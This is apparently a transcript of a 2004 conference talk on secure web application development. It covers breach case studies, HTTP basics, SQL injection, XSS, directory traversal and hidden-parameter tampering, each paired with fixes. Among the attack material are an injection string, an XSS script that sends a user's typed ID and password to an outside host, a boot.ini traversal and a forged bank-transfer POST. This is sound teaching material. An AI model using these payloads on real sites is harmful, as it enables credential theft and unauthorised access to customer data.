Transcript of Dennis Hurst, SPI Dynamics Inc - StickyMinds
BIO PRESENTATION
Better Software Conference & EXPO September 27-30, 2004
San Jose, CA USA
T16
September 30, 2004 3:00 PM
DEVELOPING SECURE WEB APPLICATIONS
Dennis Hurst SPI Dynamics Inc
Dennis Hurst, senior consulting engineer for SPI Dynamics, is responsible for working with developers to educate them on the need for Web Application security and practical ways to protect Web Applications from hacking attacks.
With more than 15 years experience in the Information Systems/Application development industry, he is an expert in system design, implementation and maintenance of complex multi-vendor, multi-platform computer applications and networks. He has extensive experience in planning, developing and enhancing Internet systems as well as integrating Internet systems with legacy systems. For the past three years he has focused on developing tools to test and secure the HTTP protocol.
Dennis is a Microsoft Certified Solution Developer (MCSD in Visual Basic and SQL Server) and a Certified Novell Engineer (CNE) for version 3.x and 4.x. Furthermore, he has published articles and developed classes on the secure application development process. Dennis has spoken on the topic of secure coding practices at Software Development West 2004, WebSec 2003 and various user group chapter meetings. He has been published in asp.net PRO and on http://www.15seconds.com/Issue/000612.htm.
Hacker Exploits, Coding Best Practices and Automated Code Testing Tools
Developing Secure Web Applications
Agenda
PART 1: Introductions
PART 2: What is Web Application Security?
PART 3: Web Application Hacks & Application Risks
PART 4: Web Applications and HTTP 101
PART 5: Web Application Attacks
PART 6: Managing & Detecting Vulnerabilities
SPI Dynamics
SPI Dynamics delivers security products and services that protect enterprises at the web application layer. These products are backed by the industry’s leading security experts, SPI Labs.
WebInspect is our industry leading web application security assessment product line and is licensed to enterprises, consultants, and other institutions, both directly and via global partners.
The Expert in Web Application Security Assessment
SPI Dynamics believes that security must be implemented across the application lifecycle. The earlier a security defect is detected the less it will ultimately cost an organization.
SPI Dynamics is dedicated to maintaining a leadership position in vulnerability assessment and we truly measure our success through the success of our customers.
PART 2
What is Web Application Security?
The evolution from web sites to web applications
Where does the risk come from?
Web Applications
Very complex architectures, multiple platforms, multiple protocols.
[Diagram: Browser -> Web Servers (Presentation Layer, Media Store, Content Services) -> Application Server (Business Logic, Web Services, Wireless) -> Database Server (Customer Identification, Access Controls, Transaction Information, Core Business Data)]
Web Applications Invite Public Access
“Today over 70% of attacks against a company’s website or web application come at the ‘Application Layer’ not the Network or System layer.”
- Gartner
Web Applications Breach the Perimeter
[Diagram: INTERNET -> DMZ -> TRUSTED INSIDE -> CORPORATE INSIDE. Only HTTP(S) passes the outer firewall; FTP, TELNET, IMAP, SSH and POP3 are blocked. Web servers: IIS, SunOne, Apache. Application servers: ASP.NET, WebSphere, Java. Databases: SQL, Oracle, DB2.]
Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server. (Any – Web Server: 80)
Firewall only allows applications on the web server to talk to the application server. (Web Server – Application Server)
Firewall only allows the application server to talk to the database server. (Application Server – Database)
PART 3
Web Application Hacks and Application Risks
Who got hacked?
How they got hacked, what method was used?
What was the result of being hacked?
Why web application risks occur
Web application vulnerabilities
Web Application Risk
“Web application incidents cost companies more than $320,000,000 in 2001.”
Forty-four percent (223 respondents) to the 2002 Computer Crime and Security Survey were willing and/or able to quantify their financial losses. These 223 respondents reported $455,848,000 in financial losses.
“2002 Computer Crime and Security Survey”
Computer Security Institute & San Francisco FBI Computer Intrusion Squad
Recent Web Application Hack Example
Ziff Davis – Hacked August 2002
Ziff Davis Media has agreed to revamp its website's security and pay affected customers $500 each after lax security exposed the personal data of thousands of subscribers last year. The agreement between Ziff Davis -- publisher of PC Magazine and other tech titles, including a slew of gaming magazines -- and attorneys general from New York, Vermont and California came after web surfers discovered an unprotected data file on Ziff Davis' site in November. The file contained names, addresses, e-mail addresses -- and, in some instances, credit card numbers -- of 12,000 people who signed up for a special promotion to receive Electronic Gaming Monthly magazine.
Recent Web Application Hacks
Victoria’s Secret, November 27, 2002
A vulnerability at the Victoria’s Secret web site allowed customers who purchased items there to view other customers’ orders.
By simply changing the data in the URL address line the web application was manipulated.
$50,000 fine and publicity in 2003
Recent Web Application Hacks
Recording Industry Association of America (RIAA), January 3, 2003
RIAA was hacked 8 times in 6 months. The 6th time the RIAA site was hacked, downloadable, pirated music was posted.
This time, a URL allowing access to the RIAA's system for posting press releases was made publicly accessible, allowing people to post messages that then appeared on the RIAA's official press release page.
Sept 25th 2003: Car Shoppers Credit Details Exposed in Bulk
An administrative page was not properly secured, and any personal loan application's information could be viewed.
Over 1,000 shoppers from multiple websites had their entire financial history exposed on a public site.
The researcher simply read the HTML comments, saw the filename, and typed it into his browser.
“The exposure of personal financial information could also put Dealerskins and its customers afoul of Federal Trade Commission (FTC) regulations”
Gateway Computers
Wall Street Journal Article “More Scary Tales Involving Big Holes in Website Security”, by Lee Gomes, February 2nd 2004
Gateway’s website stored an ID number in a cookie to identify you when returning to the site. By changing this ID number, you are able to view the information of other shoppers. Information viewable includes Name, Address, Phone Number, Order History, Last Four Digits of Credit Card, Credit Card Expiration Date, Credit Card Verification Code.
Federal Trade Commission investigates Guess Inc.
“Guess Settles with FTC over Cyber Security Snafu”, June 2003 by Kevin Poulson for SecurityFocus
“Guess.com was open to an "SQL injection attack," permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database -- over 200,000 in all … The episode prompted a year-long FTC investigation into alleged deceptive trade practices by Guess”
"Consumers have every right to expect that a business that says it's keeping personal information secure is doing exactly that," said Howard Beales, Director of the FTC's consumer protection bureau, in a press release. "It's not just good business, it's the law."
Other Hacked Websites
Tiffany.Com – 2004, SQL Injection
OpenTable.com – Non-random identifiers
Saks Fifth Avenue – Non-random identifiers
FTD.com – February 14, 2003, sequential cookies (Source: CNET News, “FTD Hole Leaks Personal Information”)
Travelocity – January 22, 2001, open directory (Source: CNET News, “Travelocity Exposes Customer Information”)
Creditcards.com – December 12, 2000, SQL Injection (Source: CNET News, “Company says extortion try exposes thousands of card numbers”)
CD Universe – January 9, 2000, SQL Injection (Source: Internetnews.com, “Failed Blackmail Attempt Leads to Credit Card Theft”)
MasterCard – February 17, 2003, Partner Liability
Tower Records – December 5, 2002, Access permissions
The Web Application Security Gap
Security Professionals Don’t Know The Applications
Application Developers and QA Professionals Don’t Know Security
Why Web Application Risks Occur
Developers Are Not Security Professionals
• Application development stresses functionality, not security
• Lack of awareness of security issues in development
• Lack of effective testing tools in Development & QA
• Resource constrained development teams
Security Professionals Are Not Developers
• Lack of awareness of application vulnerabilities in security teams
• Lack of effective testing tools
• Certification and accreditations don’t examine the web application
• Development cycle missing from security procedures and audits
• Security scrutinizes the desktop, the network, and the server. The web application is missing.
Web Application Vulnerabilities
Web application vulnerabilities occur in multiple areas.
Platform: Known Vulnerabilities
Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
Application: Parameter Manipulation, Cross-Site Scripting, SQL Injection, Buffer Overflow, Reverse Directory Traversal, JAVA Decompilation, Path Truncation, Hidden Web Paths, Cookie Manipulation, Application Mapping, Backup Checking, Directory Enumeration
Platform: Known Vulnerabilities
• Known vulnerabilities can be exploited immediately with a minimum amount of skill or experience – “script kiddies”
• Most easily defendable of all web vulnerabilities
• MUST have streamlined patching procedures
• MUST have inventory process
Web Application Vulnerabilities
Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
• Less easily corrected than known issues
• Require increased awareness
• More than just configuration, must be aware of security flaws in actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings
Web Application Vulnerabilities
Application Programming:
• User input is not examined from a security perspective.
• Unexpected code
• Error messages
Application: Parameter Manipulation, Cross-Site Scripting, SQL Injection, Buffer Overflow, Reverse Directory Traversal, JAVA Decompilation, Path Truncation, Hidden Web Paths, Cookie Manipulation, Application Mapping, Backup Checking, Directory Enumeration
PART 4
Web Applications and HTTP 101
What are the components of a web application?
How are these components secured?
How does HTTP (the web) work?
How does a hacker see your application?
The OSI Reference Model
Layer 7, Application: web based attacks (HTTP/HTTPS)
Layers 1 through 6 (Physical, Datalink, Network, Transport, Session, Presentation): network / OS / service attacks
Layers 1 through 6 deal with how data is delivered.
Layer 7 deals with business logic (content and interpretation).
What is a Web-Based Application?
What is the data path (Network) for web applications?
How does a web-based application work (HTTP)?
How does your application work?
HTTP
Web Application
Client connects to the server
Client sends request to server
Server responds to client
Connection is disconnected
HTTP is stateless
[Diagram: Client PC (10.1.0.123) sends Request to Server www.mybank.com (64.58.76.230), Port: 80, and receives Response]
How Do Web Applications Communicate?
Network Layer
Securing the Network Layer
SSL (Secure Sockets Layer)
Provides encryption of data between a client and server.
Typically guarantees to the client that the server is who it asserts itself to be.
[Diagram: SSL Tunnel between Client PC (10.1.0.123) and Server www.mybank.com (64.58.76.230), Port: 443]
Firewalls
Allows or disallows traffic to pass from the external network to the internal network.
Acts as a “traffic cop”.
Port 80 (HTTP) and port 443 (HTTPS) travel freely through the firewall.
IDS (Intrusion Detection System)
Monitors the network for malicious activities.
Typically signature based detection (similar to virus protection).
Blind to encrypted (SSL) traffic.
What is HTTP?
HTML Page:
<a href=http://www.test.me>Click Here</a>
Request (Client PC -> Server):
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.spidynamics.com
Connection: Keep-Alive
Response (Server -> Client PC):
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 07 Apr 2003 12:52:26 GMT
Content-Length: 10225
Content-Type: text/html
Cache-control: private
Set-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/;

<html><body>
How Does Your Application Work?
GET – Simple query string based request
POST – Contains POST data in the body of the request.
Network / HTTP
Web Application
HTTP – GET With a Query String
HTML Page:
<a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>
Request:
GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&ID=5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.company.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN
Response:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 04 Apr 2003 15:17:50 GMT
Content-Length: 4183
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=25; path=/;
Set-Cookie: state=GA; path=/;
Set-Cookie: username=MrUser; path=/;
Set-Cookie: userid=1538; path=/;

<HTML><HEAD><TITLE></TITLE></HEAD><BODY>
HTTP – POST With POST Data
Form:
<FORM ACTION="login1.asp" METHOD="POST"><br>Username:<INPUT TYPE="text" NAME="login"><BR>Password:<INPUT TYPE="password" NAME="password" ><BR><INPUT TYPE="submit"><BR></FORM>
Request:
POST /login1.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, */*
Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccess
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)
Host: www.company.com
Content-Length: 23
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA; ……

login=John&password=Doe
Response:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 04 Apr 2003 15:35:00 GMT
Content-Length: 80
Content-Type: text/html
Cache-control: private

<html><body>Welcome John. …………..</body></html>
PART 5
Web Application Attacks
Question
Define – What is it and what is at stake?
Result – How does it happen?
Fix – How to fix web application vulnerabilities?
Types of Attacks
SQL Injection
Cross Site Scripting (XSS)
Directory Traversal
Hidden parameters
SQL Injection – Defined
SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first.
SQL Injection – Simple Example
The vulnerable login code (classic ASP / VBScript):
'
' Login SQL Statement
'
SQLtemp = "SELECT * FROM Users " & _
          "WHERE userID = '" & Request.Form("username") & "' " & _
          "and pass = '" & Request.Form("password") & "'"
Set rs = Apples.Execute(SQLtemp)    ' Apples: the page's ADO connection object
If Not rs.EOF Then
    ' Successful login!!
    ...
SQL Injection – Simple Example
What the hacker knows:
The web page is creating a SQL statement that takes two parameters.
The parameters are both strings.
The parameters are, most likely, being passed to the database unfiltered.
The hacker can now guess that the SQL statement looks something like this:
Select <something> from <sometable> where <fieldone> = '<user input one>' And <fieldtwo> = '<user input two>'
The hacker can now start making educated guesses, for example by supplying ' or 1=1 or 'a'=' as both inputs:
Select <something> from <sometable> where <fieldone> = '' or 1=1 or 'a'='' And <fieldtwo> = '' or 1=1 or 'a'=''
SQL Injection – Solution
• Use parameterized queries
• Trap your errors!!! Don’t let the environment
• Use stored procedures
• Validate user input
• Turn off default error messages
Parameterized query in C# (ADO.NET):
using System.Data;
using System.Data.SqlClient;

SqlConnection cnn = new SqlConnection(…database connection information here…);
SqlCommand cmd = new SqlCommand("SELECT FirstName, LastName from Users "
    + "WHERE UserName = @uid AND password = @passwd", cnn);
cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value = uid;
cmd.Parameters.Add("@passwd", SqlDbType.VarChar, 100).Value = passwd;
cnn.Open();
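The following is an added example, not code from the deck or from SPI Dynamics: it rebuilds the login check above in Python against an in-memory SQLite table (a constructed stand-in for the deck's Users table), so the effect of string concatenation versus the parameterized fix can be observed directly. The table contents and column names are assumptions; the injected value is the one shown on the slide.

```python
import sqlite3

# Constructed sample database standing in for the deck's "Users" table.
def make_users_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (userID TEXT, pass TEXT, FirstName TEXT, LastName TEXT)")
    conn.execute("INSERT INTO Users VALUES ('John', 'Doe', 'John', 'Smith')")
    conn.commit()
    return conn

def login_concatenated(conn, username, password):
    """Mirrors the deck's ASP login: user input is spliced into the SQL text."""
    sql = ("SELECT * FROM Users WHERE userID = '" + username + "' "
           "and pass = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    """The fix from the deck: placeholders in the SQL, values bound by the driver."""
    sql = "SELECT FirstName, LastName FROM Users WHERE userID = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

INJECTION = "' or 1=1 or 'a'='"   # the educated guess from the slide

def sqli_demo():
    """Run both login variants with valid credentials and with the injected value."""
    conn = make_users_db()
    return {
        "concat_valid": login_concatenated(conn, "John", "Doe"),
        "concat_injected": login_concatenated(conn, INJECTION, INJECTION),
        "param_valid": login_parameterized(conn, "John", "Doe"),
        "param_injected": login_parameterized(conn, INJECTION, INJECTION),
    }

if __name__ == "__main__":
    for name, ok in sqli_demo().items():
        print(f"{name}: {'login succeeds' if ok else 'login fails'}")
```

With concatenation the injected value turns the WHERE clause into a tautology and the query returns a row without a password; with placeholders the same text is compared literally against the userID column and matches nothing.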
Cross Site Scripting (XSS)
Cross-site scripting (also known as XSS or CSS) occurs when dynamically generated web pages display input that is not properly validated.
A user passes input in the form of a parameter to the web server.
The web server returns the user provided input back to the user without proper encoding.
Example URL:
http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20<script>alert(document.cookie)</script>
Cross Site Scripting (XSS)
HTML (the login form fields):
<input type=text name=txtUserID ….
<input type=text name=txtPassword…
XSS JavaScript (injected into the page; it requests an image whose URL carries the typed user ID and password):
var oImg = new Image;
oImg.src = "http://www.test.me/"
    + document.frmTest.txtUserID.value + "."
    + document.frmTest.txtPassword.value;
Web Log:
…. 127.0.0.1 GET /test/xss.asp 200
…. 127.0.0.1 GET /MyUserID.MyPassword 404
…. 127.0.0.1 GET /test/xss.asp 200
Cross Site Scripting (XSS) - Solution
HTML Encode all data before it is RETURNED to a user’s web browser:
• Data that comes from a user
• Data that comes from a database
• Data that comes from any dynamic source
Server.HTMLEncode provides this functionality.
Validate user input.
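An added example (not from the deck) of the encoding fix: the err parameter from the slide's URL is decoded the way the server would see it, then reflected into a page first as-is and then through html.escape, Python's equivalent of Server.HTMLEncode. The page template is an assumption; the URL is the one on the slide.

```python
import html
from urllib.parse import urlsplit, parse_qs

def render_error_unencoded(err):
    """The vulnerable pattern: the reflected parameter is written into the page as-is."""
    return "<html><body><p>" + err + "</p></body></html>"

def render_error_encoded(err):
    """The fix: HTML-encode dynamic data before returning it to the browser."""
    return "<html><body><p>" + html.escape(err, quote=True) + "</p></body></html>"

def err_param_from_url(url):
    """Extract the 'err' query parameter as the server sees it (URL-decoded)."""
    params = parse_qs(urlsplit(url).query)
    return params.get("err", [""])[0]

# The URL shown on the slide.
XSS_URL = ("http://www.freebank.com/banklogin.asp?err=Invalid%20Login:"
           "%20<script>alert(document.cookie)</script>")

def xss_demo():
    err = err_param_from_url(XSS_URL)
    return {
        "decoded": err,
        "unencoded_has_script_tag": "<script>" in render_error_unencoded(err),
        "encoded_has_script_tag": "<script>" in render_error_encoded(err),
        "encoded_output": render_error_encoded(err),
    }

if __name__ == "__main__":
    for name, value in xss_demo().items():
        print(f"{name}: {value}")
```

In the encoded output the angle brackets become &lt; and &gt;, so the browser shows the text of the message instead of executing it; the same routine applies to values read from a database or any other dynamic source, not only to request parameters.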
Directory Traversal – Result
This is a standard site that shows a list of available documents in the FAQ folder.
Directory Traversal – Result
Clicking on one of the links shows the selected document.
Notice the parameter ?Template=Check+Card%2Etxt. When you URL decode that parameter it will look like:
?Template=Check Card.txt
This could be a file name.
Directory Traversal – Result
Changing the Template parameter to ../../../../../boot.ini opened the boot.ini file.A hacker now has full access to any file on the hard drive.
Directory Traversal – The Code
The vulnerable code:
sFile = Request("Template")    ' Get the parameter
If sFile <> "" Then
    ' User passed a parameter
    If fso.FileExists(sDir & "\" & sFile) Then
        Set oStream = fso.OpenTextFile(sDir & "\" & sFile, 1, False)
    End If
End If
Secure version of the code:
sFile = Request("Template")    ' Get the parameter
' Quick security check: look for invalid characters
Set re = New RegExp            ' VBScript RegExp object in place of the slide's Regex.Match call
re.Pattern = "[^a-zA-Z0-9.]"
If re.Test(sFile) Then
    sFile = ""                 ' Looks odd, don't accept it
End If
If sFile <> "" Then
    ' User passed a parameter
    If fso.FileExists(sDir & "\" & sFile) Then
        Set oStream = fso.OpenTextFile(sDir & "\" & sFile, 1, False)
    End If
End If
Directory Traversal - Fix
Avoid using a parameter as a file name.
When using a parameter as a file name use EXTREME caution to ensure that the name passed in is a valid file name and is not trying to reference a file in a parent folder.
Limit the web server to only access appropriate folders on the web server and not parent folders outside the web site file structure.
….and….. Validate user input
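An added example (not the deck's code) of the "valid file name, not a parent folder" rule in Python. It applies the same idea as the secure ASP version above, an allowlist on the name, and adds a second, independent check that the canonical path still lies inside the FAQ folder. Note that the deck's own pattern, [^a-zA-Z0-9.], would reject the space in "Check Card.txt", the legitimate name from its own walk-through, so the allowlist here permits spaces; the FAQ folder and its contents are constructed in a temporary directory.

```python
import os
import re
import tempfile
from urllib.parse import unquote_plus

# Allowlist: a template name is letters/digits/space/dot/hyphen ending in .txt,
# with no path separators and no leading dot (an assumption for this example).
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 .-]*\.txt$")

def resolve_template(base_dir, template):
    """Return the absolute path of `template` inside base_dir, or raise ValueError."""
    if not SAFE_NAME.fullmatch(template) or ".." in template:
        raise ValueError("invalid template name")
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, template))
    # Independent check: the canonical path must stay under the FAQ folder.
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes the FAQ folder")
    return path

def read_template(base_dir, template):
    with open(resolve_template(base_dir, template), encoding="utf-8") as f:
        return f.read()

def traversal_demo():
    """Constructed FAQ folder; try the slide's legitimate name and traversal attempts."""
    with tempfile.TemporaryDirectory() as tmp:
        faq = os.path.join(tmp, "faq")
        os.mkdir(faq)
        with open(os.path.join(faq, "Check Card.txt"), "w", encoding="utf-8") as f:
            f.write("Constructed FAQ content about check cards.\n")
        # The slide's raw parameter, decoded as the server would decode it.
        decoded = unquote_plus("Check+Card%2Etxt")
        results = {"decoded": decoded, "good": read_template(faq, decoded)}
        for bad in ("../../../../../boot.ini", "..\\secret.txt", "notes.txt/../x.txt"):
            try:
                read_template(faq, bad)
                results[bad] = "allowed"
            except ValueError as e:
                results[bad] = str(e)
        return results

if __name__ == "__main__":
    for name, value in traversal_demo().items():
        print(f"{name!r}: {value!r}")
```

The allowlist alone stops every name containing a separator, and the realpath/commonpath check catches anything that gets past it (for instance a symlink inside the folder pointing outside it), which is the "limit the web server to appropriate folders" point enforced in code rather than only in server configuration.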
Hidden Parameters
Hidden parameters allow developers to pass variables to and from a web browser in the same way other <input> tags do; however, they are not seen by the end user.
The format is <input type=hidden name=myname value=myvalue>
The primary danger in using hidden parameters is that they can be modified by a hacker and are seldom tested during the development and QA process.
Hidden Parameters – The Hack
Request before the hack:
POST /BankSite/xferconfirm.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://www.nubank.me/BankSite/acctxfer.asp
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)
Host: www.nubank.me
Content-Length: 103
Connection: Close
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM

fromAcct=120199789890&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfer
Request after the hack (only the hidden fromAcct value in the body has changed):
POST /BankSite/xferconfirm.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://www.nubank.me/BankSite/acctxfer.asp
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)
Host: www.nubank.me
Content-Length: 103
Connection: Close
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM

fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfe
Hidden Parameters – The Fix
Never assume a hidden parameter has not been tampered with by the end user.
Never put secure information in a hidden parameter.
Ensure that proper QA testing of all hidden parameters is done prior to going live with any application.
Add proper hidden parameter use guidelines to development methodology documents and processes.
….and again….validate user input
The fix – Trust but verify
Validate ALL user input
Validate every time you use user input
Everything in a request is “user input”
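An added example (not from the deck) covering both the hidden-parameter fix and the "trust but verify" slide: the server re-validates every field of the transfer POST from the slide and, rather than trusting the hidden fromAcct, checks it against the accounts the logged-in session actually owns. The ownership table and the session user name "HE" (taken from the slide's memo text) are constructed assumptions; the two request bodies are copied from the slide.

```python
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed ownership table: which accounts each logged-in user may debit.
ACCOUNTS_BY_USER = {
    "HE": {"120199789890"},
}

def parse_transfer(body):
    """Parse an application/x-www-form-urlencoded body into single values."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}

def validate_amount(text):
    """Accept only a positive amount with at most two decimal places."""
    try:
        amount = Decimal(text)
    except InvalidOperation:
        return None
    if amount <= 0 or amount != amount.quantize(Decimal("0.01")):
        return None
    return amount

def authorize_transfer(session_user, body):
    """Re-check every field server-side; the hidden fromAcct is never trusted."""
    form = parse_transfer(body)
    for required in ("fromAcct", "toAcct", "amount"):
        if required not in form:
            return (False, "missing " + required)
    if not form["fromAcct"].isdigit() or not form["toAcct"].isdigit():
        return (False, "account numbers must be numeric")
    if form["fromAcct"] not in ACCOUNTS_BY_USER.get(session_user, set()):
        return (False, "fromAcct is not owned by the logged-in user")
    if validate_amount(form["amount"]) is None:
        return (False, "invalid amount")
    return (True, "ok")

# Request bodies from the slide ("before" and "after" the hidden field was changed).
BEFORE = "fromAcct=120199789890&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfer"
AFTER = "fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfe"

if __name__ == "__main__":
    print("before:", authorize_transfer("HE", BEFORE))
    print("after: ", authorize_transfer("HE", AFTER))
```

The decision is made from the session, not from the form: whichever value the browser sends for fromAcct, only an account already bound to the authenticated user passes, and the amount is parsed and range-checked every time it is used rather than once at the preview step.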
PART 6
Managing and Detecting Web Application Vulnerabilities
Building a secure development process
Web application ROI
Detecting web application vulnerabilities
Managing and addressing web application security risk throughout the enterprise
Application Lifecycle Phases
Phases: Design, Development, Testing, Production
Roles across the phases: Security Operations and Auditors; Developers; QA and Developers; Auditors, Dev, and Business Subject Matter Experts (SME)
Managing Web Application Security Risk
Educate the development team.
Develop and publish best practices.
Develop secure code
Test and verify that code is developed securely
Perform routine audits of production systems.
Establish remediation procedures.
Keep track of security trends.
Bring security to the development team…
Detecting Web Application Vulnerabilities
Manual vs. Automatic Testing
Manual testing:
• Time consuming
• Expensive
• Not repeatable
• Rely on third party individuals (penetration testers)
Automated testing:
• High performance, automated web application assessment
• Cost effective
• Scalable throughout entire application lifecycle
• Consistent high quality assessments
• Provides economy of scale (SPI Labs)
• Customizable (Custom Agents)